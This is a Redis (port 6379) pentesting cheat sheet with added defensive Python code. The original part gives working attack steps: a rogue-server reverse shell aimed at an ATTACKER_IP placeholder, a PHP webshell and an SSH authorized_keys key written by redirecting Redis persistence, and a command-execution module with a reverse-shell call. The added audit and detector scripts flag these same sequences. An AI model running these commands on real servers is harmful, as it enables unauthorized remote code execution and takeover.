Port 6379 (REDIS)

Dumping Database

Inside Redis the databases are numbered starting from 0. You can see which ones are in use in the "Keyspace" section of the output of the command info:

Or you can just get the keyspace (database) section with:

INFO keyspace

In that example databases 0 and 1 are in use: database 0 contains 4 keys and database 1 contains 1. By default Redis uses database 0. To dump, for example, database 1 you need to do:

SELECT 1 [ ... Indicate the database ... ] 
KEYS * [ ... Get Keys ... ] 
GET <KEY> [ ... Get Key ... ]

In case you get the error -WRONGTYPE Operation against a key holding the wrong kind of value while running GET <KEY>, it's because the key holds something other than a string (or integer) and requires a type-specific command to display it.

To know the type of the key, use the TYPE command; examples below for list and hash keys.

TYPE <KEY> [ ... Type of the Key ... ] 
LRANGE <KEY> 0 -1 [ ... Get list items ... ] 
HGET <KEY> <FIELD> [ ... Get hash item ... ]  # If the type used is weird you can always do: DUMP <key>

Dump the database with npm redis-dump or python redis-utils
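The steps above (find the databases in INFO keyspace, SELECT each one, list its keys, read each key with the command its TYPE requires) as one script, added here as an example and not code from the original page or from redis-dump/redis-utils. It assumes a client object exposing execute_command(*args) the way redis-py's redis.Redis (created with decode_responses=True) does, and it uses SCAN instead of KEYS * so that an export does not block a busy server; the FakeRedis class is a constructed stand-in so the code runs offline.

```python
"""Inventory and export every in-use Redis database, reading each key with the
command that matches its TYPE (added example, not from the original page)."""
import re

# One line per database in the INFO "Keyspace" section, e.g.
#   db0:keys=4,expires=0,avg_ttl=0
KEYSPACE_RE = re.compile(r"^db(\d+):(.*)$")


def parse_keyspace(info_text):
    """Return {db_index: {field: int}} for each database INFO reports as in use."""
    dbs = {}
    for line in info_text.splitlines():
        m = KEYSPACE_RE.match(line.strip())
        if not m:
            continue
        fields = {}
        for pair in m.group(2).split(","):
            name, _, value = pair.partition("=")
            if name:
                fields[name] = int(value)
        dbs[int(m.group(1))] = fields
    return dbs


def scan_keys(client):
    """Iterate all keys of the selected database with SCAN (the cursor ends at "0")."""
    cursor = "0"
    while True:
        cursor, keys = client.execute_command("SCAN", cursor)
        yield from keys
        if str(cursor) == "0":
            return


def read_key(client, key):
    """Read one key with the command appropriate to its TYPE; a plain GET would
    fail with WRONGTYPE on anything but a string."""
    kind = client.execute_command("TYPE", key)
    if kind == "string":
        return client.execute_command("GET", key)
    if kind == "list":
        return client.execute_command("LRANGE", key, 0, -1)
    if kind == "hash":
        return client.execute_command("HGETALL", key)
    if kind == "set":
        return client.execute_command("SMEMBERS", key)
    if kind == "zset":
        return client.execute_command("ZRANGE", key, 0, -1, "WITHSCORES")
    # Stream or module-defined type: fall back to the serialized form.
    return client.execute_command("DUMP", key)


def dump_all(client):
    """Return {db_index: {key: value}} for every database listed by INFO keyspace."""
    in_use = parse_keyspace(client.execute_command("INFO", "keyspace"))
    result = {}
    for db in sorted(in_use):
        client.execute_command("SELECT", db)
        result[db] = {key: read_key(client, key) for key in scan_keys(client)}
    return result


class FakeRedis:
    """Constructed offline stand-in for redis.Redis: two databases, mixed key types."""

    def __init__(self):
        self.dbs = {
            0: {"user:1": "alice", "queue": ["job1", "job2"],
                "cfg": {"host": "db", "port": "5432"}, "tags": {"a", "b"}},
            1: {"scores": [("bob", 10.0)]},        # sorted set as (member, score)
        }
        self.current = 0

    def execute_command(self, cmd, *args):
        db = self.dbs[self.current]
        if cmd == "INFO":
            return "# Keyspace\n" + "\n".join(
                f"db{i}:keys={len(d)},expires=0,avg_ttl=0" for i, d in self.dbs.items())
        if cmd == "SELECT":
            self.current = int(args[0])
            return "OK"
        if cmd == "SCAN":
            return "0", list(db)                   # everything fits in one page
        if cmd == "TYPE":
            v = db[args[0]]
            if isinstance(v, str):
                return "string"
            if isinstance(v, dict):
                return "hash"
            if isinstance(v, set):
                return "set"
            return "zset" if v and isinstance(v[0], tuple) else "list"
        if cmd in ("GET", "LRANGE", "HGETALL", "SMEMBERS", "ZRANGE"):
            return db[args[0]]
        raise NotImplementedError(cmd)


if __name__ == "__main__":
    for db, keys in dump_all(FakeRedis()).items():
        print(f"db{db}: {keys}")
```

Replace FakeRedis() with redis.Redis(host=..., port=6379, decode_responses=True) to run it against a real instance; the rest of the code does not change.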

Redis RCE

Interactive Shell

redis-rogue-server can automatically obtain an interactive shell or a reverse shell on Redis (<=5.0.5).

./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ATTACKER_IP>

PHP Webshell

After running the command info, you need to know the path of the web site folder:

root@kali:~# redis-cli -h 10.85.0.52 
10.85.0.52:6379> config set dir /usr/share/nginx/html 
OK 
10.85.0.52:6379> config set dbfilename redis.php 
OK 
10.85.0.52:6379> set test "<?php phpinfo(); ?>" 
OK  
10.85.0.52:6379> save 
OK

SSH

Generate an SSH public-private key pair on your PC:

ssh-keygen -t rsa

Write the public key to a file:

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt

Import the file into redis:

cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key

Save the public key to the authorized_keys file on redis server:

root@kali:~# redis-cli -h 10.85.0.52 
10.85.0.52:6379> config set dir /var/lib/redis/.ssh 
OK 
10.85.0.52:6379> config set dbfilename "authorized_keys" 
OK 
10.85.0.52:6379> save 
OK

Finally, you can ssh to the redis server with the private key:

ssh -i ~/.ssh/id_rsa redis@10.85.0.52

This technique is automated here: https://github.com/Avinash-acid/Redis-Server-Exploit
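Both the PHP webshell and the SSH technique above work by pointing Redis persistence (dir and dbfilename) at a location it should never write to and then calling save, so the state they leave behind is visible in CONFIG GET. The audit below, added here as an example and not code from the original page, flags that state together with the settings that let an unauthenticated client change it in the first place. It takes the CONFIG GET result as a plain dict (redis-py's r.config_get("*") returns exactly that); the two sample configurations are constructed, and the password value is a placeholder.

```python
"""Audit Redis persistence and access settings for the traces left by the
persistence-redirect trick (added example, not from the original page)."""
from pathlib import PurePosixPath

# Web roots a dump directory should never point at: the nginx path is the one
# used on this page, /var/www is the Debian/Apache default.
WEB_ROOT_PREFIXES = ("/usr/share/nginx/html", "/var/www")


def audit_config(cfg):
    """Return (severity, message) findings for a CONFIG GET mapping; [] means clean."""
    findings = []
    dump_dir = cfg.get("dir", "")
    dump_file = cfg.get("dbfilename", "")

    # State left by the trick: dir moved to an SSH directory or a web root,
    # dbfilename renamed to something that is not an RDB dump.
    if ".ssh" in PurePosixPath(dump_dir).parts:
        findings.append(("high", f"dir {dump_dir!r} is an SSH key directory"))
    elif any(dump_dir.startswith(p) for p in WEB_ROOT_PREFIXES):
        findings.append(("high", f"dir {dump_dir!r} is under a web root"))
    if dump_file and not dump_file.endswith(".rdb"):
        findings.append(("high", f"dbfilename {dump_file!r} is not an .rdb file"))

    # Settings that make the trick possible for anyone who can reach port 6379.
    if not cfg.get("requirepass"):
        findings.append(("medium", "requirepass is empty: CONFIG SET needs no authentication"))
    if cfg.get("protected-mode", "yes").lower() == "no":
        findings.append(("medium", "protected-mode is off"))
    # bind may list several addresses; a leading '-' marks an optional one.
    binds = [b.lstrip("-") for b in cfg.get("bind", "").split()]
    if not binds or any(b in ("0.0.0.0", "*", "::", "::*") for b in binds):
        findings.append(("medium", f"bind {cfg.get('bind', '')!r} listens on all interfaces"))
    return findings


# Constructed samples: the state after the authorized_keys write above, and a hardened one.
COMPROMISED = {"dir": "/var/lib/redis/.ssh", "dbfilename": "authorized_keys",
               "requirepass": "", "protected-mode": "no", "bind": "0.0.0.0"}
HARDENED = {"dir": "/var/lib/redis", "dbfilename": "dump.rdb",
            "requirepass": "<placeholder-strong-password>", "protected-mode": "yes",
            "bind": "127.0.0.1"}

if __name__ == "__main__":
    for name, cfg in (("compromised", COMPROMISED), ("hardened", HARDENED)):
        print(name, audit_config(cfg) or "clean")
```

A clean result from this audit does not prove nothing was written: an attacker can set dir and dbfilename back after save, so the file system (web roots, ~/.ssh of the redis user) should be checked as well.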

Load Redis Module

Following the instructions from https://github.com/n0b0dyCN/RedisModules-ExecuteCommand you can compile a Redis module to execute arbitrary commands.

Then you need some way to upload the compiled module (for example FTP).

Load the uploaded module at runtime:

MODULE LOAD /path/to/mymodule.so

List loaded modules to check it was correctly loaded:

MODULE LIST

Execute commands:

127.0.0.1:6379> system.exec "id" 
"uid=0(root) gid=0(root) groups=0(root)" 
127.0.0.1:6379> system.exec "whoami" 
"root" 
127.0.0.1:6379> system.rev 127.0.0.1 9999

Unload the module whenever you want:

MODULE UNLOAD mymodule
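Every technique in this Redis RCE section shows up in the server's command stream: the PHP webshell and SSH sections as CONFIG SET dir / CONFIG SET dbfilename followed by SAVE from the same client, and this section as MODULE LOAD. The detector below, added here as an example and not code from the original page, parses MONITOR output (lines of the form <unix time> [<db> <client addr>] "<command>" "<arg>" ...) and raises one alert per such sequence and per module load. The sample lines are constructed to mirror the sessions shown on this page; the addresses in them are made up.

```python
"""Flag persistence redirection followed by SAVE, and MODULE LOAD, in Redis
MONITOR output (added example, not from the original page)."""
import re
import shlex

# 1700000000.100000 [0 10.85.0.10:40001] "get" "user:1"
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')


def parse_monitor_line(line):
    """Return {ts, db, client, cmd, args} for one MONITOR line, or None if it is not one."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    ts, db, client, rest = m.groups()
    # MONITOR quotes every argument with double quotes and backslash escapes,
    # which shlex handles well enough for command and argument recovery.
    args = shlex.split(rest)
    return {"ts": float(ts), "db": int(db), "client": client,
            "cmd": args[0].lower() if args else "", "args": args[1:]}


def detect(lines):
    """Return a list of (client, severity, message) alerts for a MONITOR capture."""
    alerts = []
    pending = {}  # client addr -> {"dir": value, "dbfilename": value} not yet saved
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        cmd, args, client = ev["cmd"], ev["args"], ev["client"]
        if cmd == "module" and args and args[0].lower() == "load":
            path = args[1] if len(args) > 1 else ""
            alerts.append((client, "high", f"MODULE LOAD {path}"))
        elif (cmd == "config" and len(args) >= 3 and args[0].lower() == "set"
              and args[1].lower() in ("dir", "dbfilename")):
            pending.setdefault(client, {})[args[1].lower()] = args[2]
        elif cmd in ("save", "bgsave") and client in pending:
            changes = pending.pop(client)
            detail = ", ".join(f"{k}={v}" for k, v in sorted(changes.items()))
            alerts.append((client, "high", f"persistence redirected then saved: {detail}"))
    return alerts


# Constructed capture: normal traffic from one client, the webshell sequence
# from a second, a module load from a third.
SAMPLE = """\
1700000000.100000 [0 10.85.0.10:40001] "get" "user:1"
1700000000.200000 [0 10.85.0.99:51234] "config" "set" "dir" "/usr/share/nginx/html"
1700000000.300000 [0 10.85.0.99:51234] "config" "set" "dbfilename" "redis.php"
1700000000.400000 [0 10.85.0.99:51234] "set" "test" "<?php phpinfo(); ?>"
1700000000.500000 [0 10.85.0.10:40001] "lrange" "queue" "0" "-1"
1700000000.600000 [0 10.85.0.99:51234] "save"
1700000000.700000 [0 10.85.0.77:51300] "module" "load" "/tmp/mymodule.so"
"""

if __name__ == "__main__":
    for client, severity, message in detect(SAMPLE.splitlines()):
        print(f"[{severity}] {client}: {message}")
```

MONITOR itself costs throughput, so on a production instance the same parser is better fed from a short capture or a proxy log than left running; the sequence logic does not depend on where the lines come from. Renaming or disabling CONFIG and MODULE (rename-command in redis.conf, or enable-module-command on Redis 7) removes the need to detect them at all.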
